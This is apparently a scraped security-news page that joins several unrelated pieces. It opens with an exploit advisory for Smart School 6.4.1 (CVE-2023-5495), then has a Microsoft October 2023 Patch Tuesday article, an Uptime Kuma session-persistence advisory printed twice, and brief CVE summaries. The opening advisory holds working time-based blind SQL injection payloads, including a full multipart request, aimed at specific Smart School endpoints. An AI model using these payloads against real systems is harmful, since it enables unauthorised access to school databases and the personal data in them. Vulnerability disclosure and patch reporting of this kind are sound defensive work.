Smart School version 6.4.1 suffers from multiple remote SQL injection vulnerabilities.

# Exploit Title: Smart School 6.4.1 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 28/09/2023  
# Vendor: QDocs - qdocs.net  
# Vendor Homepage: https://smart-school.in/  
# Software Link: https://demo.smart-school.in/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-5495  
# CWE: CWE-89 - CWE-74 - CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]

-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1

searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3

-------------------------------------------

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]

Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi

---  
Parameter: searchdata[0][title] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchfield] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchvalue] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][title] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][searchvalue] (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z  
---

-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]  
-------------------------------------------

Path: /online_admission

---  
Parameter: MULTIPART email ((custom) POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--  
---

POST Parameter 'email' is vulnerable to SQLi

POST /online_admission HTTP/1.1

-----------------------------320375734131102816923531485385  
Content-Disposition: form-data; name="email"

*[SQLi]  
-----------------------------320375734131102816923531485385

[-] Done

Smart School 6.4.1 SQL Injection

October's CVE update is here. Here's which security vulnerabilities to patch now to exorcise your Microsoft systems demons.

Microsoft flagged two zero-day security vulnerabilities under active attack in October's Patch Tuesday update, which affect Microsoft WordPad and Skype for Business. The release also features a critical-rated, wormable bug in Message Queuing that could instill terror for admins of vulnerable systems.

The two bugs are part of a cadre of 103 total CVEs addressed by the computing giant this month. The patches run the gamut of Microsoft's portfolio, including Azure, ASP.NET, Core, and Visual Studio; Exchange Server; Office, Microsoft Dynamics, and Windows.

Appropriately for October, the number of critical-rated vulnerabilities comes in at an unlucky 13; and notably, a full 20% of the fixes in the update relate to Microsoft Message Queuing (MSMQ).

**October 2023 Bugs Under Active Exploit**

Falling into the hair-raising active exploit camp, the first issue under attack in the wild is CVE-2023-36563, an information-disclosure bug in the WordPad word processing program that could open the door to NTLM relay attacks by exposing NTLM hashes.

"To exploit this vulnerability, an attacker must first gain access to the system," explained Mike Walters, president and co-founder of Action1, in October Patch Tuesday commentary. "Subsequently, they would run a specially crafted application designed to take advantage of the vulnerability and seize control of the affected system."

He added, "Alternatively, the attacker could persuade a local user to open a malicious file. This persuasion might involve enticing the user to click a link, often via email or instant message, and then convincing them to open the specially crafted file."

As far as mitigation goes, "Microsoft doesn't list any Preview Pane vector, so user interaction is required," said Dustin Childs, researcher for Trend Micro's Zero Day Initiative, in a blog. "In addition to applying this patch, you should consider blocking outbound NTLM over SMB on Windows 11. This new feature hasn't received much attention, but it could significantly hamper NTLM-relay exploits."

Meanwhile, CVE-2023-41763 in Skype for Business is ready to haunt admin dreams. It's listed as an elevation-of-privilege issue, but Childs pointed out that it should be treated as an information disclosure problem.

"An attacker could exploit this vulnerability by initiating a specially crafted network call to the targeted Skype for Business server," Walters said. "This action could lead to the parsing of an HTTP request sent to an arbitrary address, potentially revealing IP addresses and port numbers."

He added that some sensitive information may be exposed, including in some cases data that could grant access to internal networks. However, it won't allow the attacker to modify the exposed data or restrict access to the affected resource.

**20 Microsoft Message Queuing Vulnerabilities**

Also putting the shivers into cybersecurity defenders this month are a full 20 different MSMQ vulnerabilities, which together represent an outsized percentage of the total October fixes. One of them, CVE-2023-35349, earns the distinction of being the scariest (i.e., most severe) issue of the month; it carries a CVSS critical score of 9.8 out of 10.

The bug allows unauthenticated remote code execution (RCE) without user interaction, meaning that the issue is wormable on systems where Message Queuing is enabled.

MSMQ is used to allow applications across multiple servers or hosts to communicate with each other and allow for communications to be stored and queued as required. It is not enabled by default, but Microsoft Exchange Server can enable it during installation, according to Rob Reeves, principal security engineer at Immersive Labs.

"It is highly likely that a successful attack will afford the attacker with SYSTEM-level permissions on the target or allow for kernel exploitation," he said in emailed Patch Tuesday commentary. "It would be considered unusual for an enterprise environment to expose the MSMQ service publicly on the Internet ... so it is reasonable to assume that to leverage this vulnerability in an attack, an attacker would have first successfully phished a target network and discovered the vulnerable service during enumeration."

Users should patch immediately, but can also mitigate the problem by blocking communications on TCP Port 1801 from untrusted connections via the firewall, Reeves added.

Childs noted that the other MSMQ bugs are a mix of RCE issues that do require user interaction, and DoS flaws that do not.

"Microsoft doesn't state if successful exploitation would simply stop the service or blue screen the entire system," he noted. "They also don't note if the system would automatically recover once the DoS exploit ends. There have been many Message Queuing bugs fixed this year, so now is a great time to audit your enterprise to determine your exposure."

**Other Microsoft Bugbears to Prioritize This Month**

As far as other security monsters to be on the lookout for, CVE-2023-36434 in Windows IIS Server stands out, according to ZDI's Childs. An attacker who successfully exploits the bug could log on to an affected IIS server as another user.

The elevation-of-privilege vulnerability was labeled "important" by Microsoft, because a threat actor would need to already be present in the network to use it, but it carries a CVSS 9.8 rating.

"These days, brute force attacks can be easily automated," Childs noted. "If you're running IIS, you should treat this as a critical update and patch quickly."

Action1's Walters meanwhile highlighted a group of nine RCE vulnerabilities in the Layer 2 Tunneling Protocol, which all have a CVSS score of 8.1 (CVE-2023-41774, CVE-2023-41773, CVE-2023-41771, CVE-2023-41770, CVE-2023-41769, CVE-2023-41768, CVE-2023-41767, CVE-2023-41765, and CVE-2023-38166).

"They possess a network-based attack vector, have a high level of complexity for successful exploitation, do not require any special privileges, and demand no user interaction," he said. "Their exploitation is notably intricate ... To successfully exploit these vulnerabilities, an attacker must overcome a race condition. An unauthenticated attacker could achieve this by sending a carefully crafted protocol message to a Routing and Remote Access Service (RRAS) server."

An RCE vulnerability in Microsoft Windows Data Access Components (WDAC) OLE DB provider for SQL Server (CVE-2023-36577, CVSS 8.8) caught the eye of Jason Kikta, CISO and senior vice president at Automox.  
"Microsoft WDAC OLE DB Provider for SQL Server is a set of components designed to facilitate efficient data access from Microsoft SQL Server databases to endpoints," he said in a Patch Tuesday advisory. "It's a key element of the WDAC that allows developers to create applications capable of communicating with almost any data source, including SQL Server. This vulnerability may allow an attacker to execute arbitrary code on a targeted system by convincing a user to connect to a malicious database."

He noted, "These attacks can be mitigated by configuring the environment to connect only to trusted servers and enforcing certificate validation."  
And finally, Chris Goettl, vice president of security products at Ivanti, flagged the fact that October Patch Tuesday includes the last updates for Windows 11 21H2 and Microsoft Server 2012/2012 R2.

"The latter go into Extended Security Support (ESU) starting with a November release, and Microsoft also announced the keys used to enable these updates will be managed as part of Azure Arc. They should be released next week," he said in emailed commentary.

"End-of-life software poses a risk to an organization," he warned. "No public updates will be available for these OS versions going forward. For Windows 11 users this means upgrading to a new Windows 11 branch. For Server 2012\\2012 R2 it is highly recommended to subscribe to ESU or migrate to a newer server edition."

This month's release also includes a patch for the just-disclosed HTTP/2 Rapid Reset distributed denial of service (DDoS) bug, as well as one for an external Chromium flaw that affects Microsoft Edge.

Microsoft Patch Tuesday Haunted by Zero-Days, Wormable Bug

# Summary

Attackers with access to a users' device can gain persistent account access.
This is caused by missing verification of Session Tokens after password changes and/or elapsed inactivity-periods.

# Details

`uptime-kuma` sets JWT tokens for users after successful authentication.

These tokens have the following design flaws:
- After successful login, a JWT token and it is stored in `sessionStorage` or `localStorage`. 
  Which of the two is decided based on the `Remember Me` button. 
  The users' token is valid without any time limitation, even after long periods of inactivity. 
  This increases the risk of session hijacking if, for example, a user forgets to log off and leaves the PC.
- sessions are only deleted on the client side after a user loggs out, meaning a local attacker could reuse said token with deep system access over the browser
- If a user changes a password
  - any previously logged in clients are not logged out
  - previously issued tokens remained valid forever

These flaws allow user cookies to remain valid even after changing passwords or being inactive, posing a high security risk.

# POC
### Password resets not deactivating cookies
- Log in.
- Note the user cookie.
- Change your password.
- Attempt to log in again with the same cookie.
- The cookie remains valid despite the password change.

### Inactivity not deactivating sessions
 In testing, even after a period of over a day of inactivity, the session was still valid

# Impact

Another person with local access to the device could take over the session permanently, even after hours of previous inactivity or a password change.
Such activity would not be obvious to the user (see https://github.com/louislam/uptime-kuma/issues/3481 if you want to help with this).

With this gained account access, an attacker can cause:

## confidentially loss
- monitors (including private ones not shared on public status pages)
- notification providers 
- settings like `api-keys` (only used for accessing `/metrics`)
- settings like secrets like the `Steam API Key`
- maintenance periods

## availability loss 

- by creating a lot of monitors and setting the retention policy very high leading to degraded database performance or out of storage
- by creating a lot of `HTTP(s) - Browser Engine (Chrome/Chromium) (Beta)` leading to RAM exhaustion

## integrity loss
- by the attacker deleting a monitor
- by the attacker deleting a monitor's history
- by the atacker changing the meaning of a monitor (changing where it points)

## scope creep
If operated in some restricted network, access to monitors may provide the ability to change the scope of the attack to a different piece of infrastructure, for example via SQL commands to a database server.
We have not classified this as `changed scope` because credentials stored in the application for accessing other systems are existing valid paths across the trust boundary, and the user should be aware of that.

**Summary**

Attackers with access to a users' device can gain persistent account access.  
This is caused by missing verification of Session Tokens after password changes and/or elapsed inactivity-periods.

**Details**

uptime-kuma sets JWT tokens for users after successful authentication.

These tokens have the following design flaws:

*   After successful login, a JWT token and it is stored in sessionStorage or localStorage.  
    Which of the two is decided based on the Remember Me button.  
    The users' token is valid without any time limitation, even after long periods of inactivity.  
    This increases the risk of session hijacking if, for example, a user forgets to log off and leaves the PC.
*   sessions are only deleted on the client side after a user loggs out, meaning a local attacker could reuse said token with deep system access over the browser
*   If a user changes a password
    *   any previously logged in clients are not logged out
    *   previously issued tokens remained valid forever

These flaws allow user cookies to remain valid even after changing passwords or being inactive, posing a high security risk.

**POC****Password resets not deactivating cookies**

*   Log in.
*   Note the user cookie.
*   Change your password.
*   Attempt to log in again with the same cookie.
*   The cookie remains valid despite the password change.

**Inactivity not deactivating sessions**

In testing, even after a period of over a day of inactivity, the session was still valid

**Impact**

Another person with local access to the device could take over the session permanently, even after hours of previous inactivity or a password change.  
Such activity would not be obvious to the user (see louislam/uptime-kuma#3481 if you want to help with this).

With this gained account access, an attacker can cause:

**confidentially loss**

*   monitors (including private ones not shared on public status pages)
*   notification providers
*   settings like api-keys (only used for accessing /metrics)
*   settings like secrets like the Steam API Key
*   maintenance periods

**availability loss**

*   by creating a lot of monitors and setting the retention policy very high leading to degraded database performance or out of storage
*   by creating a lot of HTTP(s) - Browser Engine (Chrome/Chromium) (Beta) leading to RAM exhaustion

**integrity loss**

*   by the attacker deleting a monitor
*   by the attacker deleting a monitor's history
*   by the atacker changing the meaning of a monitor (changing where it points)

**scope creep**

If operated in some restricted network, access to monitors may provide the ability to change the scope of the attack to a different piece of infrastructure, for example via SQL commands to a database server.  
We have not classified this as changed scope because credentials stored in the application for accessing other systems are existing valid paths across the trust boundary, and the user should be aware of that.

**References**

*   GHSA-g9v2-wqcj-j99g
*   https://nvd.nist.gov/vuln/detail/CVE-2023-44400
*   louislam/uptime-kuma#3481
*   louislam/uptime-kuma@88afab6

GHSA-g9v2-wqcj-j99g: Uptime Kuma has Persistentent User Sessions

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

CVE-2023-36730

Microsoft SQL Server Denial of Service Vulnerability

CVE-2023-36728

CVE-2023-36785

CVE-2023-36420

Microsoft SQL ODBC Driver Remote Code Execution Vulnerability

CVE-2023-36417

A vulnerability classified as critical has been found in Tongda OA 2017 11.10. Affected is an unknown function of the file general/hr/salary/welfare_manage/delete.php. The manipulation of the argument WELFARE_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-241650 is the identifier assigned to this vulnerability.

CVE-2023-5497

Election Services Co. (ESC) Internet Election Service is vulnerable to SQL injection in multiple pages and parameters. These vulnerabilities allow an unauthenticated, remote attacker to read or modify data for any elections that share the same backend database. ESC deactivated older and unused elections and enabled web application firewall (WAF) protection for current and future elections on or around 2023-08-12.


Tag

#sql